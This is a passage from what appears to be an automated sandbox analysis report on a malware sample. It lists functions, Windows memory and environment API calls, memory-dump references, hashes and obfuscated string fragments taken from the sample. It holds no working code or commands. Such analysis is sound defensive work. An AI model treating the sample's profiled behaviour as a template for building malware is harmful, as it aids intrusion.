                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1377338329.000000000037D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1377338329.00000000003A6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1377338329.00000000003AD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1377338329.00000000003BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1377780020.00000000003BE000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1377957039.0000000000569000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1378006431.000000000056A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_b0000_35K4Py4lii.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: FreeHeap
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 3298025750-0
                                                                                                                                                                                                                                          • Opcode ID: ae5085fd2713327155cfb82ae35dcd3eb58e819a0c8c1eedd387c1245911ea10
                                                                                                                                                                                                                                          • Instruction ID: cc75b544c9cf2ed93b3bf5cd5da40c45de58fe76f17ca5c685215aeaeda4b245
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: ae5085fd2713327155cfb82ae35dcd3eb58e819a0c8c1eedd387c1245911ea10
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 94D0C931515122EBC6102F28BC05BD73A549F89220F074891F444AA475C665EC91DAD0
                                                                                                                                                                                                                                          Function 000EC55C Relevance: 1.5, APIs: 1, Instructions: 5memoryCOMMON
                                                                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                                          control_flow_graph 187 ec55c-ec568 RtlAllocateHeap
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • RtlAllocateHeap.NTDLL(?,00000000), ref: 000EC561
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1377246456.00000000000B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 000B0000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1377216226.00000000000B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1377246456.00000000000F5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1377308662.0000000000103000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1377338329.0000000000105000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1377338329.0000000000290000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1377338329.000000000037D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1377338329.00000000003A6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1377338329.00000000003AD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1377338329.00000000003BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1377780020.00000000003BE000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1377957039.0000000000569000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1378006431.000000000056A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_b0000_35K4Py4lii.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: AllocateHeap
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 1279760036-0
                                                                                                                                                                                                                                          • Opcode ID: a1d841155b655e25f958cf182284c91f1f1ae490f5c98b5c7bbec53a1476fcc0
                                                                                                                                                                                                                                          • Instruction ID: 4fddec8d1bcce9af504b20dfff94977552fbe3505903bd1f3c042f536f40062c
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: a1d841155b655e25f958cf182284c91f1f1ae490f5c98b5c7bbec53a1476fcc0
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 9FA001711845109ADA562B24BC09B887A21AB59621F124192E541594B686B298969A84
                                                                                                                                                                                                                                          Function 00109A43 Relevance: 1.3, APIs: 1, Instructions: 44memoryCOMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • VirtualAlloc.KERNELBASE(00000000), ref: 00109A69
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1377338329.0000000000105000.00000040.00000001.01000000.00000003.sdmp, Offset: 000B0000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1377216226.00000000000B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1377246456.00000000000B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1377246456.00000000000F5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1377308662.0000000000103000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1377338329.0000000000290000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1377338329.000000000037D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1377338329.00000000003A6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1377338329.00000000003AD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1377338329.00000000003BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1377780020.00000000003BE000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1377957039.0000000000569000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1378006431.000000000056A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_b0000_35K4Py4lii.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: AllocVirtual
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 4275171209-0
                                                                                                                                                                                                                                          • Opcode ID: 1d2257d2745106efa7e50c58469cf416bb36813fd1eba50e185f1ad7be3d37c9
                                                                                                                                                                                                                                          • Instruction ID: f0810b543d159777b0d86968fc7a6c8bf3f75b0abb67f427ac61b4627f271673
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 1d2257d2745106efa7e50c58469cf416bb36813fd1eba50e185f1ad7be3d37c9
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 0D012BF2918300DBDB082F34D59517E7AE4EB80300F66063ED5C2C3784D5B19851C657
                                                                                                                                                                                                                                          Function 00109542 Relevance: 1.3, APIs: 1, Instructions: 32memoryCOMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • VirtualAlloc.KERNELBASE(00000000), ref: 00109B70
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1377338329.0000000000105000.00000040.00000001.01000000.00000003.sdmp, Offset: 000B0000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1377216226.00000000000B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1377246456.00000000000B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1377246456.00000000000F5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1377308662.0000000000103000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1377338329.0000000000290000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1377338329.000000000037D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1377338329.00000000003A6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1377338329.00000000003AD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1377338329.00000000003BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1377780020.00000000003BE000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1377957039.0000000000569000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1378006431.000000000056A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_b0000_35K4Py4lii.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: AllocVirtual
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 4275171209-0
                                                                                                                                                                                                                                          • Opcode ID: 04d60ad4dbc004973a6f840f2df714304c163a2afd8cf168560e662c41c8faf0
                                                                                                                                                                                                                                          • Instruction ID: b2d14b6cd4a80c74e55afb1e92afbf3800ecb2bbca52d9872faf182787baa46e
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 04d60ad4dbc004973a6f840f2df714304c163a2afd8cf168560e662c41c8faf0
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 1CF090B090C7089BD700AF6DC4886AEFBE0EF54711F12842DDAD583B80EB756C54DA97
                                                                                                                                                                                                                                          Function 000BDDBB Relevance: 1.3, APIs: 1, Instructions: 24COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1377246456.00000000000B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 000B0000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1377216226.00000000000B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1377246456.00000000000F5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1377308662.0000000000103000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1377338329.0000000000105000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1377338329.0000000000290000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1377338329.000000000037D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1377338329.00000000003A6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1377338329.00000000003AD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1377338329.00000000003BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1377780020.00000000003BE000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1377957039.0000000000569000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1378006431.000000000056A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_b0000_35K4Py4lii.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: Uninitialize
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 3861434553-0
                                                                                                                                                                                                                                          • Opcode ID: fcd1325a72e41f883630ceecde0e0f5512f8b5745cb65bbb9b9244c1ed44f679
                                                                                                                                                                                                                                          • Instruction ID: 326378da91e0a315690fdaa389c93c4a6e28dbeac42df484c8f5ef8b3203c964
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: fcd1325a72e41f883630ceecde0e0f5512f8b5745cb65bbb9b9244c1ed44f679
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 89C0803537C40147E34CD330DD724FB32068F873457146839C5074274BD674B515D541

                                                                                                                                                                                                                                          Non-executed Functions

                                                                                                                                                                                                                                          Function 000D42D0 Relevance: 43.1, APIs: 2, Strings: 22, Instructions: 1129COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • RtlExpandEnvironmentStrings.NTDLL(00000000,?,0000001E,00000000,00000000,?), ref: 000D43AA
                                                                                                                                                                                                                                          • RtlExpandEnvironmentStrings.NTDLL(00000000,?,0000001E,00000000,?,?), ref: 000D443E
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1377246456.00000000000B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 000B0000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1377216226.00000000000B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1377246456.00000000000F5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1377308662.0000000000103000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1377338329.0000000000105000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1377338329.0000000000290000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1377338329.000000000037D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1377338329.00000000003A6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1377338329.00000000003AD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1377338329.00000000003BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1377780020.00000000003BE000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1377957039.0000000000569000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1378006431.000000000056A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_b0000_35K4Py4lii.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: EnvironmentExpandStrings
                                                                                                                                                                                                                                          • String ID: +$e$+$e$ n l$%r?p$<j:h$=:$DD$N~4|$RE$Xs$bF$e>n<$gd$r:i8$ut$13$=?$b`$tj$uw$y{$|r
                                                                                                                                                                                                                                          • API String ID: 237503144-3098290998
                                                                                                                                                                                                                                          • Opcode ID: 49b42a815a8145f5727505fb6a837502dbc0c92dad265be3579b41c60636ab52
                                                                                                                                                                                                                                          • Instruction ID: 20e40eb0e0045f78acce6ec228c6192dd01161e6ad7a3d1b3953941fa71405f1
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 49b42a815a8145f5727505fb6a837502dbc0c92dad265be3579b41c60636ab52
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 48C20DB560C3848AE334CF14C8527DFBAF2FB82300F00892DD5E96B655D7B5464A9B9B
                                                                                                                                                                                                                                          Function 000D4560 Relevance: 39.6, APIs: 1, Strings: 21, Instructions: 1081COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1377246456.00000000000B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 000B0000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1377216226.00000000000B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1377246456.00000000000F5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1377308662.0000000000103000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1377338329.0000000000105000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1377338329.0000000000290000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1377338329.000000000037D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1377338329.00000000003A6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1377338329.00000000003AD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1377338329.00000000003BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1377780020.00000000003BE000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1377957039.0000000000569000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1378006431.000000000056A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_b0000_35K4Py4lii.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID: +$e$ n l$%r?p$<j:h$=:$DD$N~4|$RE$Xs$bF$e>n<$gd$r:i8$ut$13$=?$b`$tj$uw$y{$|r
                                                                                                                                                                                                                                          • API String ID: 0-635273613
                                                                                                                                                                                                                                          • Opcode ID: 91b93fb8e2c7f36ac602a10c33e7e2ba0bd9f0a93c1b9e087979990e2a1f3fac
                                                                                                                                                                                                                                          • Instruction ID: a2f012464d78f8474e23b87e74cc614c891476e428180f0e956cc6632a02af52
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 91b93fb8e2c7f36ac602a10c33e7e2ba0bd9f0a93c1b9e087979990e2a1f3fac
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 3AC21DB560C3848AE334CF14C842BDFBAF2FB82300F00892DD5E96B655D7B546499B9B
                                                                                                                                                                                                                                          Function 000C60E9 Relevance: 17.1, Strings: 13, Instructions: 807COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1377246456.00000000000B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 000B0000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1377216226.00000000000B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1377246456.00000000000F5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1377308662.0000000000103000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1377338329.0000000000105000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1377338329.0000000000290000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1377338329.000000000037D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1377338329.00000000003A6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1377338329.00000000003AD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1377338329.00000000003BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1377780020.00000000003BE000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1377957039.0000000000569000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1378006431.000000000056A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_b0000_35K4Py4lii.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID: *,-"$3F&D$JyTK$ntxE$pt}w$qRb`$t~v:$uqrs$w}MI${zdy$~mfQ$L4$L4
                                                                                                                                                                                                                                          • API String ID: 0-2746398225
                                                                                                                                                                                                                                          • Opcode ID: bf253ed0db7e67e6d0f72b062f6dc2871efea6a5d260abcadf0c603858a144b6
                                                                                                                                                                                                                                          • Instruction ID: 44e05476b4f98a19664d470b3dd3b91185d08cb7f4a74d61f26dbfa200392a06
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: bf253ed0db7e67e6d0f72b062f6dc2871efea6a5d260abcadf0c603858a144b6
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 3D4203B26082518FD7348F28D891BAFB7E2FBD5314F19893CD4DA87256DB369805CB42
                                                                                                                                                                                                                                          Function 0026C57A Relevance: 16.7, Strings: 12, Instructions: 1670COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1377338329.0000000000105000.00000040.00000001.01000000.00000003.sdmp, Offset: 000B0000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1377216226.00000000000B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1377246456.00000000000B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1377246456.00000000000F5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1377308662.0000000000103000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1377338329.0000000000290000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1377338329.000000000037D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1377338329.00000000003A6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1377338329.00000000003AD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1377338329.00000000003BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1377780020.00000000003BE000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1377957039.0000000000569000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1378006431.000000000056A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_b0000_35K4Py4lii.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID: 0-,3$2Zkw$4y:b$8\_$8gkj$9y:b$O*t|$_^w$hZ?$ugz$wK-$wK-
                                                                                                                                                                                                                                          • API String ID: 0-3547893746
                                                                                                                                                                                                                                          • Opcode ID: fbb55922eb9531fdb54f646ac4dc46c956fb6c7433d90a5b4d74dd914e148a67
                                                                                                                                                                                                                                          • Instruction ID: 3e492c1947307497add79d84d5381b8f79b59c559c1877e2c7ead41e640cb597
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: fbb55922eb9531fdb54f646ac4dc46c956fb6c7433d90a5b4d74dd914e148a67
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 1CB25AF3A0C204AFE304AE2DEC8567ABBE9EF94320F16463DE6C5C7744E53598058696
                                                                                                                                                                                                                                          Function 001E8380 Relevance: 11.8, Strings: 9, Instructions: 558COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1377338329.0000000000105000.00000040.00000001.01000000.00000003.sdmp, Offset: 000B0000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1377216226.00000000000B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1377246456.00000000000B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1377246456.00000000000F5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1377308662.0000000000103000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1377338329.0000000000290000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1377338329.000000000037D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1377338329.00000000003A6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1377338329.00000000003AD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1377338329.00000000003BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1377780020.00000000003BE000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1377957039.0000000000569000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1378006431.000000000056A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_b0000_35K4Py4lii.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID: 9$>$J$R$U$d$r$r$u
                                                                                                                                                                                                                                          • API String ID: 0-3518325649
                                                                                                                                                                                                                                          • Opcode ID: 640b191d5e579a332ff1566a5254c9fd5eed92c32ab72aebfd22b661e00db750
                                                                                                                                                                                                                                          • Instruction ID: d81c8204c3af7c6c69068e14f92b3970ae626a4d77b8f0ddd6ff8c7e23199b15
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 640b191d5e579a332ff1566a5254c9fd5eed92c32ab72aebfd22b661e00db750
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 8012B1B3F619554BF7640839CD493A6198387E1320F2F8678CA9C9B7C6DDBE8C4A0384
                                                                                                                                                                                                                                          Function 0026E160 Relevance: 10.4, Strings: 7, Instructions: 1631COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1377338329.0000000000105000.00000040.00000001.01000000.00000003.sdmp, Offset: 000B0000, based on PE: true
